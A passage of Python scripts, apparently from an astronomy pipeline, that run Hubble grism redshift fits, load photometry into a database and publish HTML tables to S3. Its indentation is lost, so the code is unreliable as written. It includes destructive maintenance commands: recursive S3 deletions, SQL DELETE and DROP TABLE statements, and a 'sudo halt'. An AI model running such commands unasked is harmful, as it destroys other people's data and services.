df['mw_ebv'] = fp.meta['MW_EBV']
fp.rename_column('filter','filters')
for k in ['filters','target','proposal_id']:
df[k] = ' '.join([t for t in np.unique(fp[k])])
#df['proposal_id'] = ' '.join([t for t in np.unique(fp['target'])])
print(f'Send {root} to db.charge_fields')
df.to_sql('charge_fields', engine, index=False, if_exists='append', method='multi')
def update_charge_fields():
"""
"""
from grizli.aws import db
files = [f.replace('.png','.fits') for f in glob.glob('j*footprint.png')]
files.sort()
for file in files:
db.add_by_footprint(file, engine=engine)
orig = db.from_sql('select field_root, log from charge_fields', engine)
gtab = db.from_sql('select field_root, log from charge_fields', engine)
bucket = 'grizli-v1'
for st, dir in enumerate(['Start','Failed','Finished']):
print(dir)
os.system('aws s3 ls s3://{0}/Pipeline/Log/{1}/ | sed "s/.log//" > /tmp/{1}'.format(bucket, dir))
fin = utils.read_catalog(f'/tmp/{dir}', format='ascii')
print('{0} {1}'.format(dir, len(fin)))
for i, r in enumerate(fin['col4']):
ix = gtab['field_root'] == r
if ix.sum() > 0:
gtab['log'][ix] = '{0} {1}-{2}'.format(dir, fin['col1'][i], fin['col2'][i])
# update the table
df = gtab[~gtab['log'].mask].to_pandas()
df.to_sql('log_tmp', engine, index=False, if_exists='replace', method='multi')
sql = "UPDATE charge_fields ch SET log = tmp.log FROM log_tmp tmp WHERE tmp.field_root = ch.field_root"
engine.execute(sql)
def overview_table():
"""
Generate a new overview table with the redshift histograms
"""
from grizli.aws import db as grizli_db
import pandas as pd
from grizli import utils
engine = grizli_db.get_db_engine()
ch = from_sql("select * from charge_fields", engine)
by_mag = from_sql("select p_root as root, COUNT(p_root) as nmag from photometry_apcorr where mag_auto < 24 group by p_root;", engine)
by_nz = from_sql("select root, COUNT(root) as nz from redshift_fit where bic_diff > 30 group by root;", engine)
for count in [by_mag, by_nz]:
new_col = count.colnames[1]
ch[new_col] = -1
for r, n in zip(count['root'], count[new_col]):
ix = ch['field_root'] == r
ch[new_col][ix] = n
zhist = ['https://s3.amazonaws.com/grizli-v1/Pipeline/{0}/Extractions/{0}_zhist.png'.format(r) for r in ch['field_root']]
ch['zhist'] = ['<a href="{1}"><img src={0} height=300px></a>'.format(zh, zh.replace('_zhist.png', '.html')) for zh in zhist]
cols = ['field_root', 'field_ra', 'field_dec', 'mw_ebv', 'gaia5', 'nassoc', 'nfilt', 'filter', 'target', 'comment', 'proposal_id', 'proposal_pi', 'field_t_g800l', 'field_t_g102', 'field_t_g141', 'mast', 'footprint', 'rgb', 'nmag', 'nz', 'zhist', 'summary', 'log']
sortable = []
for c in cols:
if not hasattr(ch[c][0], 'upper'):
sortable.append(c)
# https://s3.amazonaws.com/grizli-v1/Master/CHArGE-July2019.html
table_root = 'CHArGE-July2019.zhist'
ch[cols].write_sortable_html('{0}.html'.format(table_root), replace_braces=True, localhost=False, max_lines=1e5, table_id=None, table_class='display compact', css=None, filter_columns=sortable, buttons=['csv'], toggle=True, use_json=True)
os.system('aws s3 sync ./ s3://grizli-v1/Master/ --exclude "*" --include "{1}.html" --include "{1}.json" --acl public-read'.format('', table_root))
def run_all_redshift_fits():
##############
# Run all
from grizli.aws import db as grizli_db
import pandas as pd
engine = grizli_db.get_db_engine()
# By grism
res = pd.read_sql_query("select field_root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where (nassoc < 200 AND (field_t_g800l > 0 OR field_t_g141 > 0 OR field_t_g102 > 0) AND log LIKE '%%inish%%');", engine)
orig_roots = pd.read_sql_query('select distinct root from redshift_fit', engine)['root'].tolist()
count = 0
for i, (root, ta, tb, tr, pi) in enumerate(zip(res['field_root'], res['field_t_g800l'], res['field_t_g102'], res['field_t_g141'], res['proposal_pi'])):
if root in orig_roots:
continue
count += 1
zmax = 1.6
if tb > 0:
zmax = 2.2
if tr > 0:
zmax = 3.2
print('\n\n', i, count, root, ta, tb, tr, pi, zmax, '\n\n')
phot_root = None
try:
grizli_db.run_lambda_fits(root, phot_root=phot_root,
min_status=6, zr=[0.01, zmax])
except:
pass
####
# Redo fits on reprocessed fields
# for i in range(2,11):
# root = 'j214224m4420gr{0:02d}'.format(i)
# print(root)
#
res = engine.execute("DELETE from redshift_fit WHERE (root = '{0}')".format(root), engine)
res = engine.execute("DELETE from redshift_fit_quasar WHERE (root = '{0}')".format(root), engine)
res = engine.execute("DELETE from stellar_fit WHERE (root = '{0}')".format(root), engine)
res = engine.execute("DELETE from photometry_apcorr WHERE (p_root = '{0}')".format(root), engine)
if False:
# Remove the whole thing
res = engine.execute("DELETE from exposure_log WHERE (parent = '{0}')".format(root), engine)
res = engine.execute("DELETE from charge_fields WHERE (field_root = '{0}')".format(root), engine)
grizli_db.run_lambda_fits(root, phot_root=root, min_status=2, zr=[0.01, zmax], mag_limits=[15, 26], engine=engine)
# for root in "j233844m5528 j105732p3620 j112416p1132 j113812m1134 j113848m1134 j122852p1046 j143200p0959 j152504p0423 j122056m0205 j122816m1132 j131452p2612".split():
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'q_z', 'q_z > -0.69 as q_z_TPR90', 'dlinesn'], where="AND status > 4 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'rgb', 'line'], show_hist=True)
grizli_db.aws_rgb_thumbnails(root, engine=engine)
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_zhist.png s3://grizli-v1/tables/'.format(root))
def aws_rgb_thumbnails(root, bucket='grizli-v1', engine=None, thumb_args={}, ids=None, verbose=True, res=None):
"""
Make thumbnails for everything that has an entry in the redshift_fit table
"""
from grizli.aws import aws_drizzler, fit_redshift_lambda
if engine is None:
engine = get_db_engine(echo=False)
if res is None:
res = from_sql("SELECT root, id, ra, dec FROM redshift_fit WHERE root = '{0}' AND ra > 0".format(root), engine)
aws_prep_dir = 's3://{0}/Pipeline/{1}/Prep/'.format(bucket, root)
aws_bucket = 's3://{0}/Pipeline/{1}/Thumbnails/'.format(bucket, root)
event = {'make_segmentation_figure': True,
'aws_prep_dir': aws_prep_dir,
'single_output': True,
'combine_similar_filters': True,
'show_filters': ['visb', 'visr', 'y', 'j', 'h'],
'include_ir_psf': False,
'include_saturated': True,
'subtract_median': True,
'sync_fits': True,
'thumb_height': 2.0,
'scale_ab': 21,
'aws_bucket': aws_bucket,
'master': None,
'rgb_params': {'xsize': 4, 'output_dpi': None,
'rgb_min': -0.01, 'add_labels': False,
'output_format': 'png', 'show_ir': False,
'scl': 2, 'suffix': '.rgb', 'mask_empty': False,
'tick_interval': 1, 'pl': 1},
'remove': True,
'filters': ['f160w', 'f140w', 'f125w', 'f105w', 'f110w', 'f098m',
'f850lp', 'f814w', 'f775w', 'f606w', 'f475w',
'f555w', 'f600lp', 'f390w', 'f350lp'],
'half_optical_pixscale': True,
'theta': 0,
'kernel': 'square',
'pixfrac': 0.33,
'wcs': None,
'size': 6,
'pixscale': 0.1}
for k in thumb_args:
event[k] = thumb_args[k]
N = len(res)
for i in range(N):
id = res['id'][i]
ra = res['ra'][i]
dec = res['dec'][i]
root_i = res['root'][i]
if ids is not None:
if id not in ids:
continue
event['ra'] = ra
event['dec'] = dec
event['label'] = '{0}_{1:05d}'.format(root_i, id)
fit_redshift_lambda.send_event_lambda(event, verbose=verbose)
def count_sources_for_bad_persistence():
"""
Count the number of extracted objects for each id and look for fields
with few objects, which are usually problems with the persistence mask
"""
import pandas as pd
from grizli.aws import db as grizli_db
from grizli import utils
engine = grizli_db.get_db_engine(echo=False)
# Number of matches per field
counts = pd.read_sql_query("select root, COUNT(root) as n from redshift_fit, photometry_apcorr where phot_root = p_root AND id = p_id AND bic_diff > 5 AND mag_auto < 24 group by root;", engine)
counts = utils.GTable.from_pandas(counts)
so = np.argsort(counts['n'])
sh = """
BUCKET=grizli-v
root=j113812m1134
aws s3 rm --recursive s3://grizli-v1/Pipeline/${root}/ --include "*"
grism_run_single.sh ${root} --run_fine_alignment=True --extra_filters=g800l --bucket=grizli-v1 --preprocess_args.skip_single_optical_visits=True --mask_spikes=True --persistence_args.err_threshold=1
"""
def add_missing_photometry():
# Add missing photometry
import os
import pandas as pd
from grizli.aws import db as grizli_db
from grizli.pipeline import photoz
from grizli import utils
engine = grizli_db.get_db_engine(echo=False)
res = pd.read_sql_query("select distinct root from redshift_fit where root like 'j%%'", engine)['root'].tolist()
orig_roots = pd.read_sql_query('select distinct p_root as root from photometry_apcorr', engine)['root'].tolist()
# Missing grism fields?
res = pd.read_sql_query("select field_root as root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where (field_t_g800l > 0 OR field_t_g141 > 0 OR field_t_g102 > 0) AND log LIKE '%%inish%%';", engine)['root'].tolist()
orig_roots = pd.read_sql_query('select distinct root from redshift_fit', engine)['root'].tolist()
# All photometry
res = pd.read_sql_query("select field_root as root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where nassoc < 200 AND log LIKE '%%inish%%' AND field_root LIKE 'j%%';", engine)['root'].tolist()
orig_roots = pd.read_sql_query('select distinct p_root as root from photometry_apcorr', engine)['root'].tolist()
count = 0
for root in res:
if root not in orig_roots:
#break
count += 1
print(count, root)
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_phot_apcorr.fits .'.format(root))
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_phot.fits .'.format(root))
if not os.path.exists('{0}_phot_apcorr.fits'.format(root)):
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Prep/{0}_phot_apcorr.fits .'.format(root))
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Prep/{0}_phot.fits .'.format(root))
if os.path.exists('{0}_phot_apcorr.fits'.format(root)):
grizli_db.add_phot_to_db(root, delete=False, engine=engine)
else:
if os.path.exists('{0}_phot.fits'.format(root)):
# Make the apcorr file
utils.set_warnings()
total_flux = 'flux_auto'
try:
obj = photoz.eazy_photoz(root, object_only=True,
apply_prior=False, beta_prior=True,
aper_ix=1,
force=True,
get_external_photometry=False,
compute_residuals=False,
total_flux=total_flux)
except:
continue
grizli_db.add_phot_to_db(root, delete=False,
engine=engine, nmax=500)
# 3D-HST
copy = """
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/egs-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot_apcorr.fits --acl public-read
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/egs-mosaic_phot.fits s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot.fits --acl public-read
"""
grizli_db.run_lambda_fits('egs-grism-j141956p5255', min_status=6, zr=[0.01, 3.2])
copy = """
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/uds-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/uds-grism-j021732m0512/Extractions/uds-grism-j021732m0512_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('uds-grism-j021732m0512', min_status=6, zr=[0.01, 3.2])
# GDS
copy = """
aws s3 rm s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-grism-j033236m2748_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-g800l-j033236m2748_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/gds-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/gds-grism-j033236m2748_phot_apcorr.fits --acl public-read
aws s3 cp s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/gds-grism-j033236m2748_phot_apcorr.fits s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/gds-g800l-j033236m2748_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('gds-grism-j033236m2748', phot_root='gds-grism-j033236m2748', min_status=6, zr=[0.01, 3.2], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
grizli_db.run_lambda_fits('gds-g800l-j033236m2748', phot_root='gds-grism-j033236m2748', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
# GDN
copy = """
#aws s3 rm s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-g800l-j033236m2748_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/ --recursive --exclude "*" --include "gdn-grism-j123656p6215_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gdn-g800l-j123656p6215/Extractions/ --recursive --exclude "*" --include "gdn-g800l-j123656p6215_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/gdn-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/gdn-grism-j123656p6215_phot_apcorr.fits --acl public-read
aws s3 cp s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/gdn-grism-j123656p6215_phot_apcorr.fits s3://grizli-v1/Pipeline/gdn-g800l-j123656p6215/Extractions/gdn-g800l-j123656p6215_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('gdn-grism-j123656p6215', phot_root='gdn-grism-j123656p6215', min_status=6, zr=[0.01, 3.2], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
grizli_db.run_lambda_fits('gdn-g800l-j123656p6215', phot_root='gdn-grism-j123656p6215', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
# 3D-HST G800L
copy = """
aws s3 rm s3://grizli-v1/Pipeline/egs-g800l-j141956p5255/Extractions/ --recursive --exclude "*" --include "egs-g800l-j141956p5255_[0-9]*"
aws s3 cp s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot_apcorr.fits s3://grizli-v1/Pipeline/egs-g800l-j141956p5255/Extractions/egs-g800l-j141956p5255_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('egs-g800l-j141956p5255', phot_root='egs-grism-j141956p5255', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
res = grizli_db.wait_on_db_update('egs-g800l-j141956p5255', dt=15, n_iter=120, engine=engine)
res = grizli_db.wait_on_db_update('uds-g800l-j021732m0512', dt=15, n_iter=120, engine=engine)
# UDS
copy = """
aws s3 rm s3://grizli-v1/Pipeline/uds-g800l-j021732m0512/Extractions/ --recursive --exclude "*" --include "uds-g800l-j021732m0512_[0-9]*"
aws s3 cp s3://grizli-v1/Pipeline/uds-grism-j021732m0512/Extractions/uds-grism-j021732m0512_phot_apcorr.fits s3://grizli-v1/Pipeline/uds-g800l-j021732m0512/Extractions/uds-g800l-j021732m0512_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('uds-g800l-j021732m0512', phot_root='uds-grism-j021732m0512', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
grizli_db.run_lambda_fits('egs-g800l-j141956p5255', phot_root='egs-grism-j141956p5255', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
# Cosmos on oliveraws
copy = """
aws s3 rm s3://grizli-cosmos-v2/Pipeline/cos-grism-j100012p0210/Extractions/ --recursive --exclude "*" --include "cos-grism-j100012p0210_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/Cosmos/cos-cnd-mosaic_phot_apcorr.fits s3://grizli-cosmos-v2/Pipeline/cos-grism-j100012p0210/Extractions/cos-grism-j100012p0210_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('cos-grism-j100012p0210', min_status=6, zr=[0.01, 3.2], mag_limits=[17, 17.1], bucket='grizli-cosmos-v2')
os.system('sudo halt')
def set_column_formats(info, extra={}, convert_mtime=True, **kwargs):
"""
Set predefined format strings of table columns
Parameters
----------
info : `astropy.table.Table`
Data table, updated in place
extra : dict
Dictionary with extra format codes as values and column names as keys
convert_mtime : bool
If ``'mtime'`` column found in `info`, convert all time strings to
sortable ISO format with `~grizli.utils.ctime_to_iso`.
"""
# Print formats
formats = {}
formats['ra'] = formats['dec'] = '.5f'
formats['mag_auto'] = formats['delta_z'] = '.2f'
formats['chinu'] = formats['chimin'] = formats['chimax'] = '.1f'
formats['bic_diff'] = formats['bic_temp'] = formats['bic_spl'] = '.1f'
formats['bic_poly'] = '.1f'
formats['dlinesn'] = formats['bic_spl'] = '.1f'
formats['flux_radius'] = formats['flux_radius_20'] = '.1f'
formats['flux_radius_90'] = '.1f'
formats['log_pdf_max'] = formats['log_risk'] = '.1f'
formats['d4000'] = formats['d4000_e'] = '.2f'
formats['dn4000'] = formats['dn4000_e'] = '.2f'
formats['z_spec'] = formats['z_map'] = formats['reshift'] = '.3f'
formats['z_spec_dr'] = '.1f'
formats['t_g141'] = formats['t_g102'] = formats['t_g800l'] = '.0f'
formats['zwidth1'] = formats['zw1'] = '.3f'
formats['zwidth2'] = formats['zw2'] = '.3f'
formats['q_z'] = '.2f'
formats['dz'] = '.3f'
for k in extra:
formats[k] = extra[k]
for c in info.colnames:
if c in formats:
info[c].format = formats[c]
elif c.startswith('sn_'):
info[c].format = '.1f'
elif c.startswith('mag_'):
info[c].format = '.2f'
elif '_ujy' in c:
info[c].format = '.2f'
elif c.startswith('ew_'):
info[c].format = '.1f'
elif ('q_z' in c):
info[c].format = '.2f'
elif ('zw' in c) | ('z_map' in c):
info[c].format = '.3f'
elif ('chinu' in c):
info[c].format = '.1f'
elif c.startswith('bic_'):
info[c].format = '.1f'
elif c in ['z02', 'z16', 'z50', 'z84', 'z97']:
info[c].format = '.3f'
elif c[:4] in ['splf', 'sple']:
info[c].format = '.1e'
elif c.startswith('flux_') | c.startswith('err_'):
info[c].format = '.1e'
if convert_mtime & ('mtime' in info.colnames):
iso_times = [utils.ctime_to_iso(m, verbose=False, strip_decimal=True)
for m in info['mtime']]
info['mtime'] = iso_times
def query_from_ds9(ds9, radius=5, engine=None, extra_cols=['mag_auto', 'z_map', 'bic_diff', 't_g800l', 't_g102', 't_g141'], extra_query='', table_root='/tmp/ds9_query'):
"""
Make a table by running a query for objects based on a DS9 pan position
"""
from grizli import utils, prep
if engine is None:
engine = get_db_engine(echo=False)
ra, dec = np.cast[float](ds9.get('pan fk5').split())
dd = radius/3600.
dr = dd/np.cos(dec/180*np.pi)
min_cols = ['root', 'id', 'status', 'ra', 'dec']
colstr = ','.join(min_cols + extra_cols)
q = from_sql(f'select {colstr} '
f'from redshift_fit natural join photometry_apcorr '
f'where ra > {ra-dr} AND ra < {ra+dr}'
f' AND dec > {dec-dd} and dec < {dec+dd}' + extra_query,
engine)
tt = utils.GTable()
tt['ra'] = [ra]
tt['dec'] = [dec]
_idx, _dr = tt.match_to_catalog_sky(q)
q['_dr'] = _dr
q['_dr'].format = '.2f'
so = np.argsort(q['_dr'])
make_html_table(sync=None, res=q[so], use_json=False, table_root=table_root, sort_column=('_dr', 1))
comment = [f'{id}' for id in q['id'][so]]
prep.table_to_regions(q[so], table_root+'.reg', comment=comment)
return q[so]
def make_html_table(engine=None, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e'], where="AND status >= 5 AND root='j163852p4039'", tables=[], table_root='query', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], sort_column=('bic_diff', -1), fit_table='redshift_fit', verbose=True, get_sql=False, res=None, show_hist=False, extra_formats={}, use_json=True, use_join=False):
"""
"""
import time
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from grizli import utils
from grizli.aws import db as grizli_db
if engine is None:
engine = get_db_engine(echo=False)
if len(tables) > 0:
extra_tables = ','+','.join(tables)
else:
extra_tables = ''
if use_join:
query = "SELECT {0} FROM {1} NATURAL JOIN photometry_apcorr WHERE {2};".format(','.join(columns), fit_table, where)
query = query.replace('WHERE AND', 'AND')
else:
query = "SELECT {0} FROM photometry_apcorr, {3}{1} WHERE phot_root = p_root AND id = p_id {2};".format(','.join(columns), extra_tables, where, fit_table)
if get_sql:
return query
if res is not None:
info = res
else:
res = pd.read_sql_query(query, engine)
info = utils.GTable.from_pandas(res)
if verbose:
print('Query: {0}\n Results N={1}'.format(query, len(res)))
if 'cdf_z' in info.colnames:
info.remove_column('cdf_z')
for c in info.colnames:
if c.startswith('p_'):
try:
info.rename_column(c, c[2:])
except:
pass
all_columns = info.colnames.copy()
if 'idx' not in info.colnames:
idx = ['<a href="http://vizier.u-strasbg.fr/viz-bin/VizieR?-c={0:.6f}+{1:.6f}&-c.rs=2">#{2:05d}</a>'.format(info['ra'][i], info['dec'][i], info['id'][i]) for i in range(len(info))]
info['idx'] = idx
all_columns.insert(0, 'idx')
all_columns.pop(all_columns.index('id'))
set_column_formats(info, extra=extra_formats)
print('Sort: ', sort_column, sort_column[0] in all_columns)
if sort_column[0] in all_columns:
scol = info[sort_column[0]]
if hasattr(scol, 'mask'):
sdata = scol.filled(fill_value=-np.inf).data
else:
sdata = scol
so = np.argsort(sdata)[::sort_column[1]]
#info = info[so[::sort_column[1]]]
# PNG columns
AWS = 'https://s3.amazonaws.com/grizli-v1/Pipeline'
bucket = ['grizli-cosmos-v2' if r.startswith('cos-') else 'grizli-v1' for r in info['root']]
for ext in png_ext:
if ext == 'thumb':
subdir = 'Thumbnails'
print(ext, subdir)
elif ext == 'rgb':
subdir = 'Thumbnails'
else:
subdir = 'Extractions'
if 'png_{0}'.format(ext) not in info.colnames:
png = ['{0}_{1:05d}.{2}.png'.format(root, id, ext) for root, id in zip(info['root'], info['id'])]
if ext == 'rgb':
js = '<a href={0}/{2}><img src={0}/{1} onmouseover="this.src = this.src.replace(\'rgb.pn\', \'seg.pn\')" onmouseout="this.src = this.src.replace(\'seg.pn\', \'rgb.pn\')" height=200></a>'
paths = ['{0}/{1}/{2}'.format(AWS.replace('grizli-v1', buck),
root, subdir)
for buck, root in zip(bucket, info['root'])]
png_url = [js.format(path, p,
p.replace('.rgb.png', '.thumb.png'))
for path, p in zip(paths, png)]
info['png_{0}'.format('rgb')] = png_url
else:
info['png_{0}'.format(ext)] = ['<a href="{0}/{1}/{2}/{3}"><img src={0}/{1}/{2}/{3} height=200></a>'.format(AWS.replace('grizli-v1', buck), root, subdir, p) for buck, root, p in zip(bucket, info['root'], png)]
all_columns.append('png_{0}'.format(ext))
sortable = []
for c in all_columns:
if not hasattr(info[c][0], 'upper'):
sortable.append(c)
info[all_columns][so].write_sortable_html('{0}.html'.format(table_root), replace_braces=True, localhost=False, max_lines=1e5, table_id=None, table_class='display compact', css=None, filter_columns=sortable, buttons=['csv'], toggle=True, use_json=use_json)
if show_hist:
from matplotlib.ticker import FixedLocator, AutoLocator, MaxNLocator
xti = xt = np.arange(0, 3.6, 0.5)
loc = np.arange(0, 3.6, 0.1)
bins = utils.log_zgrid([0.03, 3.5], 0.01)
fig = plt.figure(figsize=[8, 4])
ax = fig.add_subplot(111)
ax.hist(np.log(1+res['z_map']), bins=np.log(1+bins), color='k',
alpha=0.2, label=table_root, normed=False)
clip = res['bic_diff'].values > 30
ax.hist(np.log(1+res['z_map'].values[clip]), bins=np.log(1+bins),
color='r', alpha=0.3, normed=False)
xts = ax.set_xticks(np.log(1+xt))
xtl = ax.set_xticklabels(xti)
ax.xaxis.set_minor_locator(FixedLocator(np.log(1+loc)))
ax.yaxis.set_major_locator(MaxNLocator(integer=True))
ax.set_xlabel('z_map')
ax.set_ylabel(r'$N$')
# Label to show line mis-id
dz_wrong = (6563.-5007)/5007
ax.plot(np.arange(5)*dz_wrong, np.ones(5)*ax.get_ylim()[1], marker='.', markerfacecolor='w', markeredgecolor='w', color='r', markersize=10)
ax.set_xlim(0, np.log(1+3.7))
ax.grid()
ax.legend(loc='upper right')
fig.tight_layout(pad=0.1)
fig.text(1-0.02, 0.02, utils.nowtime(), ha='right', va='bottom',
transform=fig.transFigure, fontsize=5)
fig.savefig('{0}_zhist.png'.format(table_root))
if sync:
os.system('aws s3 sync ./ {0} --exclude "*" --include "{1}.html" --include "{1}.json" --include "{1}_zhist.png" --acl public-read'.format(sync, table_root))
return res
def get_exposure_info():
"""
Get exposure information from the MAST databases
"""
import mastquery.query
master = 'grizli-v1-19.12.04'
master = 'grizli-v1-19.12.05'
master = 'grizli-v1-20.10.12'
tab = utils.read_catalog('{0}_visits.fits'.format(master))
all_visits = np.load('{0}_visits.npy'.format(master), allow_pickle=True)[0]
all_files = []
for v in all_visits:
all_files.extend(v['files'])
prog = [f[1:4] for f in all_files]
_res = np.unique(np.array(prog), return_counts=True)
t = utils.GTable()
t['prog'] = _res[0]
t['count'] = _res[1]
so = np.argsort(t['count'])
t = t[so[::-1]]
for pr in t['prog']:
if os.path.exists('{0}_query.fits'.format(pr)):
#print('Skip ', pr)
continue
print(pr)
try:
_q = mastquery.query.run_query(obs_id='[ij]{0}*'.format(pr))
_p = mastquery.query.get_products_table(_q)
except:
continue
_q.write('{0}_query.fits'.format(pr))
_p.write('{0}_prod.fits'.format(pr))
# Send to AWS
from grizli.aws import db
import pandas as pd
from astropy.table import Table
engine = db.get_db_engine()
files = glob.glob('*query.fits')
files.sort()
cols = ['obs_id', 'target', 'target_ra', 'target_dec', 't_min', 't_max', 'exptime', 'wavelength_region', 'filter', 'em_min', 'em_max', 'target_classification', 'obs_title', 't_obs_release', 'instrument_name', 'proposal_pi', 'proposal_id', 'proposal_type', 'sregion', 'dataRights', 'mtFlag', 'obsid', 'objID', 'visit']
for i, file in enumerate(files):
print(file)
_q = Table.read(file, character_as_bytes=False)
_q['proposal_id'] = np.cast[np.int16](_q['proposal_id'])
_q['obsid'] = np.cast[np.int64](_q['obsid'])
_q['objID'] = np.cast[np.int64](_q['objID'])
_q.rename_column('ra','target_ra')
_q.rename_column('dec','target_dec')
_q.rename_column('footprint', 'sregion')
df = _q[cols].to_pandas()
df.to_sql('mast_query', engine, index=False, if_exists='append', method='multi')
files = glob.glob('*_prod.fits')
files.sort()
cols = ['obsid', 'dataset']
for i, file in enumerate(files):
print(i, file)
_p = Table.read(file, character_as_bytes=False)
_p['obsid'] = np.cast[np.int64](_p['obsid'])
_p['dataset'] = [d[:-1] for d in _p['observation_id']]
df = _p[cols].to_pandas()
df.to_sql('mast_products', engine, index=False, if_exists='append', method='multi')
##########
# Exposure log
# Initialize, adding an array column manually for the footprints
v = all_visits[0]
N = len(v['files'])
fps = [np.array(fp.convex_hull.boundary.xy)[:, :-1].tolist() for fp in v['footprints']]
df = pd.DataFrame()
df['file'] = [f.split('_')[0] for f in v['files']]
df['dataset'] = [f.split('_')[0][:-1] for f in v['files']]
df['extension'] = [f.split('_')[1][:3] for f in v['files']]
df['filter'] = v['filter']
df['parent'] = v['parent']
df['awspath'] = v['awspath']
df['product'] = v['product']
df['filter'] = v['product'].split('-')[-1]
df['ra'] = [fp.centroid.xy[0][0] for fp in v['footprints']]
df['dec'] = [fp.centroid.xy[1][0] for fp in v['footprints']]
df['area'] = [fp.area*np.cos(df['dec'][i]/180*np.pi)*3600 for i, fp in enumerate(v['footprints'])]
# Make table
engine.execute('drop table exposure_log;')
df.to_sql('exposure_log', engine, index=False, if_exists='append', method='multi')
engine.execute('alter table exposure_log add column footprint float [];')
engine.execute('delete from exposure_log where True;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN mdrizsky float;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN exptime float;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN expstart float;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN ndq int;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN expflag VARCHAR;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN sunangle float;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky101 real;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky102 real;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky103 real;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN persnpix integer;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN perslevl real;')
_exp = db.from_sql("select distinct(file) from exposure_log", engine)
db_files = np.unique(_exp['file'])
charge = db.from_sql("select * from charge_fields", engine)
SKIP = 1000
df0 = None
for i, v in enumerate(all_visits):
_count = np.sum([f.split('_')[0] in db_files for f in v['files']])
if _count == len(v['files']):
continue
if v['parent'] not in charge['field_root']:
print('Warning: {0} not in charge["field_root"]'.format(v['parent']))
continue
print(i, v['parent'], v['product'], _count, len(v['files']))
N = len(v['files'])
fps = [np.array(fp.convex_hull.boundary.xy)[:, :-1].tolist() for fp in v['footprints']]
df = pd.DataFrame()
df['file'] = [f.split('_')[0] for f in v['files']]
df['dataset'] = [f.split('_')[0][:-1] for f in v['files']]
df['extension'] = [f.split('_')[1][:3] for f in v['files']]
df['filter'] = v['filter']
df['parent'] = v['parent']
df['awspath'] = v['awspath']
df['product'] = v['product']
df['filter'] = v['product'].split('-')[-1]
df['ra'] = [fp.centroid.xy[0][0] for fp in v['footprints']]
df['dec'] = [fp.centroid.xy[1][0] for fp in v['footprints']]
df['area'] = [fp.area*np.cos(df['dec'][i]/180*np.pi)*3600 for i, fp in enumerate(v['footprints'])]
df['footprint'] = fps
if df0 is None:
df0 = df
else:
